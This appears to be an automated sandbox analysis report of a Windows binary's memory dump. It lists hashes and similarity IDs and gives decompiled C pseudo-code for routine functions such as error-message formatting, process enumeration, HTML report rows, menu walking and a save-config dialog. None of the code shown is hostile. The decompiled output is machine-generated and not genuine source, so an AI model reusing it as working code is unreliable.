Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpywcslen$_snwprintfmemset
String ID: %s (%s)
API String ID: 3979103747-1363028141
Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040614F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040B550(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040B278();
					if(_t26 != 0) {
						E00406025(_t34,  &_v8712);
					}
				}
				return 1;
			}

0x00406157
0x0040616d
0x00406174
0x0040617f
0x00406185
0x00406196
0x0040619e
0x004061b6
0x004061bd
0x004061d4
0x004061da
0x004061e0
0x004061e5
0x004061e6
0x004061ef
0x004061f9
0x004061ff
0x004061ef
0x00406206

APIs

memset.MSVCRT ref: 00406174
GetDlgCtrlID.USER32 ref: 0040617F
GetWindowTextW.USER32 ref: 00406196
memset.MSVCRT ref: 004061BD
GetClassNameW.USER32 ref: 004061D4
_wcsicmp.MSVCRT ref: 004061E6

Part of subcall function 00406025: memset.MSVCRT ref: 00406038
Part of subcall function 00406025: _itow.MSVCRT ref: 00406046

Strings

sysdatetimepick32, xrefs: 004061E0

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
String ID: sysdatetimepick32
API String ID: 1028950076-4169760276
Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D

Uniqueness

Uniqueness Score: -1.00%

Function 00404706, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52
librarywindowCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00404706(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40c4e8);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}

0x00404706
0x00404714
0x0040471c
0x00404721
0x0040472b
0x00404733
0x00404735
0x00404735
0x00404733
0x00404751
0x00404780
0x00404753
0x0040475e
0x00404766
0x0040476c
0x00404770
0x00404770
0x0040478a

APIs

LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
wcslen.MSVCRT ref: 00404756
wcscpy.MSVCRT ref: 00404766
LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
wcscpy.MSVCRT ref: 00404780

Strings

netmsg.dll, xrefs: 00404726

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
String ID: netmsg.dll
API String ID: 2767993716-3706735626
Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040598B, Relevance: 12.1, APIs: 8, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				char _v72;
				void _v582;
				long _v584;
				void* __edi;
				intOrPtr _t27;
				wchar_t* _t34;
				wchar_t* _t42;
				long* _t43;
				int _t44;
				void* _t52;
				void* _t54;
				long _t56;
				long* _t57;
				void* _t60;

				_t60 = __eflags;
				_t52 = __edx;
				E004095AB( &_v72);
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				E004095FD(_t52, _t60,  &_v72);
				_t27 = 0;
				_v12 = 0;
				if(_v20 <= 0) {
					L10:
					_t56 = 0;
				} else {
					do {
						_t57 = E00405A92(_t27,  &_v32);
						if(E00409A94( *_t57,  &_v584) == 0) {
							goto L9;
						} else {
							_t34 =  &_v584;
							_push(_t34);
							_push(_a4);
							L0040B278();
							if(_t34 == 0) {
								L5:
								_t44 = 0;
								_t54 = OpenProcess(0x2000000, 0,  *_t57);
								if(_t54 == 0) {
									goto L9;
								} else {
									_v16 = _v16 & 0;
									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
										_t44 = 1;
										CloseHandle(_v16);
									}
									CloseHandle(_t54);
									if(_t44 != 0) {
										_t56 =  *_t57;
									} else {
										goto L9;
									}
								}
							} else {
								_t42 = wcschr( &_v584, 0x5c);
								if(_t42 == 0) {
									goto L9;
								} else {
									_t43 =  &(_t42[0]);
									_push(_t43);
									_push(_a4);
									L0040B278();
									if(_t43 != 0) {
										goto L9;
									} else {
										goto L5;
									}
								}
							}
						}
						goto L12;
						L9:
						_t27 = _v12 + 1;
						_v12 = _t27;
					} while (_t27 < _v20);
					goto L10;
				}
				L12:
				E004095DA( &_v72);
				return _t56;
			}

0x0040598b
0x0040598b
0x0040599a
0x004059ae
0x004059b5
0x004059c1
0x004059c6
0x004059cb
0x004059ce
0x00405a7b
0x00405a7b
0x004059d4
0x004059d4
0x004059dc
0x004059ee
0x00000000
0x004059f0
0x004059f0
0x004059f6
0x004059f7
0x004059fa
0x00405a03
0x00405a2b
0x00405a2e
0x00405a3c
0x00405a40
0x00000000
0x00405a42
0x00405a42
0x00405a54
0x00405a59
0x00405a5a
0x00405a5a
0x00405a61
0x00405a69
0x00405a7f
0x00000000
0x00000000
0x00000000
0x00405a69
0x00405a05
0x00405a0e
0x00405a17
0x00000000
0x00405a19
0x00405a19
0x00405a1c
0x00405a1d
0x00405a20
0x00405a29
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a29
0x00405a17
0x00405a03
0x00000000
0x00405a6b
0x00405a6e
0x00405a72
0x00405a72
0x00000000
0x004059d4
0x00405a81
0x00405a84
0x00405a8f

APIs

memset.MSVCRT ref: 004059B5

Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C

Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34

_wcsicmp.MSVCRT ref: 004059FA
wcschr.MSVCRT ref: 00405A0E
_wcsicmp.MSVCRT ref: 00405A20
OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
CloseHandle.KERNEL32(?), ref: 00405A5A
CloseHandle.KERNEL32(00000000), ref: 00405A61

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
String ID:
API String ID: 768606695-0
Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98

Uniqueness

Uniqueness Score: -1.00%

Function 00407639, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t95;
				intOrPtr* _t98;
				void* _t100;
				void* _t102;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t102 = _t100 + 0x18;
				asm("movsw");
				E00407343(__ebx, _a4, L"<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t98 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
						E0040ADC0(_v28,  &_v108);
						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
						_t67 =  *(_t73 + 0x64);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
						}
						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
						_push( *((intOrPtr*)(_t73 + 0x68)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x60)));
						L0040B1EC();
						_t102 = _t102 + 0x1c;
						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
				}
				return E00407343(_t73, _a4, L"\r\n");
			}

0x00407639
0x00407646
0x00407647
0x00407654
0x0040765f
0x0040765f
0x0040766b
0x0040766d
0x00407672
0x00407677
0x0040767d
0x00407680
0x00407686
0x00407691
0x00407697
0x00407699
0x00407699
0x0040769c
0x0040769f
0x004076a3
0x004076a7
0x004076ab
0x004076b5
0x004076be
0x004076c8
0x004076de
0x004076ee
0x004076f1
0x004076f4
0x004076fa
0x00407708
0x0040770e
0x00407718
0x0040771d
0x00407723
0x00407724
0x00407727
0x0040772c
0x0040772f
0x00407734
0x0040773f
0x00407744
0x00407745
0x0040767d
0x00407760

APIs

wcscat.MSVCRT ref: 00407708
_snwprintf.MSVCRT ref: 0040772F

Strings

 , xrefs: 00407702
<td bgcolor=#%s nowrap>%s, xrefs: 00407649
<td bgcolor=#%s>%s, xrefs: 00407657
<tr>, xrefs: 00407661

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfwcscat
String ID:  $<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
API String ID: 384018552-4153097237
Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040605E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79
windowCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040B550(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E0040605E(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x40fe20 =  *0x40fe20 + 1;
							_t32 =  *0x40fe20; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406025(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}

0x0040605e
0x00406061
0x00406069
0x00406074
0x0040607a
0x0040607e
0x00406082
0x00406148
0x0040614e
0x00000000
0x00000000
0x00000000
0x00406088
0x00406088
0x00406093
0x00406098
0x0040609f
0x004060ae
0x004060b6
0x004060be
0x004060c6
0x004060ca
0x004060cf
0x004060d7
0x00000000
0x00000000
0x004060de
0x00406129
0x00406129
0x0040612d
0x0040612f
0x00406130
0x00406134
0x00406137
0x0040613c
0x0040613c
0x00000000
0x0040612d
0x004060e7
0x004060f0
0x004060f2
0x004060f2
0x004060f9
0x004060fd
0x00406102
0x0040610c
0x00406112
0x00406117
0x00406117
0x00406104
0x00406104
0x00406104
0x00406104
0x00406102
0x00406122
0x00406128
0x00000000
0x0040613f
0x0040613f
0x00406140
0x00000000

APIs

GetMenuItemCount.USER32 ref: 00406074
memset.MSVCRT ref: 00406093
GetMenuItemInfoW.USER32 ref: 004060CF
wcschr.MSVCRT ref: 004060E7

Strings

0, xrefs: 004060AE
6, xrefs: 004060B6

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMenu$CountInfomemsetwcschr
String ID: 0$6
API String ID: 2029023288-3849865405
Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00402BEE, Relevance: 10.6, APIs: 7, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00402BEE(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t27;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t41;
				int _t50;

				_t34 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
					return _t27;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t41 = GetSystemMetrics(0x4c);
					_t31 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t41 = 0;
						_t31 = 0;
					} else {
						_v8 = _v8 + _t41;
						_v12 = _v12 + _t31;
					}
					_t50 = _v20 - _v28;
					if(_t50 > 0x14) {
						_t38 = _v24;
						_t37 = _v16 - _t38;
						if(_t37 > 0x14 && _v20 > _t41 + 5) {
							_t31 = _t31 + 0xfffffff6;
							if(_t38 >= _t31) {
								_t31 = _v28;
								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
								}
							}
						}
					}
					return _t31;
				}
			}

0x00402bee
0x00402bf8
0x00402cae
0x00402c08
0x00402c10
0x00402c11
0x00402c12
0x00402c13
0x00402c20
0x00402c27
0x00402c2e
0x00402c30
0x00402c37
0x00402c4b
0x00402c50
0x00402c53
0x00402c55
0x00402c3e
0x00402c3e
0x00402c41
0x00402c41
0x00402c5a
0x00402c60
0x00402c65
0x00402c68
0x00402c6d
0x00402c77
0x00402c7c
0x00402c7e
0x00402c87
0x00402ca5
0x00402ca5
0x00402c87
0x00402c7c
0x00402c6d
0x00000000
0x00402cac

APIs

GetSystemMetrics.USER32 ref: 00402C1C
GetSystemMetrics.USER32 ref: 00402C23
GetSystemMetrics.USER32 ref: 00402C2A
GetSystemMetrics.USER32 ref: 00402C30
GetSystemMetrics.USER32 ref: 00402C47
GetSystemMetrics.USER32 ref: 00402C4E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$Window
String ID:
API String ID: 1155976603-0
Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98

Uniqueness

Uniqueness Score: -1.00%

Function 004036D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004036D5(void* __edi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				char _v28;
				char* _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				int _v72;
				intOrPtr _v76;
				wchar_t* _v80;
				intOrPtr _v84;
				int _v92;
				char* _v96;
				intOrPtr _v104;
				struct tagOFNA _v108;
				void _v634;
				long _v636;
				void _v2682;
				char _v2684;
				void* __ebx;
				char _t37;
				intOrPtr _t38;
				int _t46;
				signed short _t54;

				_v636 = 0;
				memset( &_v634, 0, 0x208);
				_v2684 = 0;
				memset( &_v2682, 0, 0x7fe);
				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
				_v12 = _t37;
				_t38 =  *0x40cbf0; // 0x67
				_v8 = _t38;
				_v28 = E00405B81(0x227);
				_v24 = L"*.cfg";
				_v20 = E00405B81(0x228);
				_v16 = L"*.*";
				E00405236( &_v2684,  &_v28);
				_t54 = 0xa;
				_v60 = E00405B81(_t54);
				_v104 =  *((intOrPtr*)(__edi + 0x10));
				_v48 =  &_v12;
				_v96 =  &_v2684;
				_v108 = 0x4c;
				_v92 = 0;
				_v84 = 1;
				_v80 =  &_v636;
				_v76 = 0x104;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0x80806;
				_t46 = GetSaveFileNameW( &_v108);
				if(_t46 != 0) {
					wcscpy( &_v636, _v80);
					return E0040365E(__edi, 1,  &_v636);
				}
				return _t46;
			}

0x004036ef
0x004036f6
0x0040370b
0x00403712
0x00403717
0x0040371c
0x0040371f
0x0040372c
0x00403735
0x00403738
0x00403744
0x00403751
0x00403758
0x00403760
0x00403769
0x0040376c
0x00403778
0x0040377b
0x0040378b
0x00403792
0x00403795
0x00403798
0x0040379b
0x004037a2
0x004037a5
0x004037a8
0x004037af
0x004037b7
0x004037c3
0x00000000
0x004037d4
0x004037dc

APIs

memset.MSVCRT ref: 004036F6
memset.MSVCRT ref: 00403712

Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99

Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E

Part of subcall function 00405236: memset.MSVCRT ref: 00405257
Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA

GetSaveFileNameW.COMDLG32(?), ref: 004037AF
wcscpy.MSVCRT ref: 004037C3

Strings

cfg, xrefs: 00403717
L, xrefs: 0040378B

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
String ID: L$cfg
API String ID: 275899518-3734058911
Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED0, Relevance: 10.6, APIs: 7, Instructions: 63
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v20;
				long _v276;
				long _v532;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
						wcscpy(_a4,  &_v276);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v532);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40c4e8);
				}
				return _a4;
			}

0x00404ed0
0x00404edf
0x00404ef6
0x00000000
0x00404f00
0x00404f1c
0x00404f31
0x00404f41
0x00404f4e
0x00404f5d
0x00404f66
0x00404f69
0x00404f69
0x00404f71
0x00404f77
0x00404f7d

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
wcscpy.MSVCRT ref: 00404F41
wcscat.MSVCRT ref: 00404F4E
wcscat.MSVCRT ref: 00404F5D
wcscpy.MSVCRT ref: 00404F71

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
